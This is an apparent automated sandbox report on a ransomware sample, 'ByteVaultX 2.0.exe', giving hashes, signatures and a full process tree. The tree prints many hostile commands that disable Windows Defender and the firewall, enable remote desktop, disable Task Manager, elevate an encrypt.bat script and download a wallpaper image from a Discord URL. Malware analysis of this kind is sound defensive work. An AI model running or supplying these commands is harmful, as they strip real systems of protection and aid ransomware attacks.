Analysis
-
max time kernel
1050s -
max time network
1051s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64 arch:x86 image:win11-20240426-en locale:en-us os:windows11-21h2-x64 system -
submitted
25/05/2024, 23:42
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win11-20240426-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
d4c033244c9bf694cf7063f136b01e30
-
SHA1
a460178565327d0a0b756d165ff0fa3aae5f7abe
-
SHA256
1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5
-
SHA512
78f267f14fa35e975237c877e3de5e5e918c7f80c622ba255429f5a92572aa84a49b233f0ef36d6c65409c3297bbe14a528608cc6a843d8dc14eec7a0b27d75d
-
SSDEEP
196608:4h7iRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:hGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&
Extracted
C:\Encrypt\encrypt.html
Signatures
-
Renames multiple (156) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 64 IoCs
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 64 IoCs
-
Loads dropped DLL 12 IoCs
pid Process
4228 ByteVaultX 2.0.exe
-
Drops desktop.ini file(s) 8 IoCs
description ioc Process
File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe
File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe
File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe
File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe
File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe
File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe
-
Sets desktop wallpaper using registry 2 TTPs 64 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
-
Modifies registry class 64 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process
2640 msedge.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process
2640 msedge.exe
-
Suspicious use of SendNotifyMessage 12 IoCs
pid Process
2640 msedge.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵PID:2932
-
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff979d33cb8,0x7ff979d33cc8,0x7ff979d33cd84⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:24⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:84⤵PID:1684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:14⤵PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:14⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:2528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:14⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:14⤵PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:14⤵PID:3896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:14⤵PID:352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5544 /prefetch:24⤵PID:4776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵PID:3008
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵PID:4796
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵PID:1700
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵PID:3268
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵PID:2424
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵
- Modifies Windows Firewall
PID:4048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵
- Modifies Windows Firewall
PID:1156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵PID:1008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵PID:4188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵PID:628
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵PID:248
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵PID:3940
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵PID:2788
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵PID:3116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵PID:1092
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵PID:2752
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵PID:3732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵PID:3808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵PID:1808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵PID:2288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4204 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵PID:2300
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵PID:3184
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵PID:2412
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵PID:4916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵PID:3704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵
- Modifies Windows Firewall
PID:4300
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵PID:4864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵PID:3564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵PID:1332
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵PID:2764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵PID:4800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵PID:2528
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵PID:3940
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵PID:2220
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵PID:4568
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵PID:1548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵PID:3568
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵PID:3172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵PID:1632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵PID:4380
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵PID:3100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
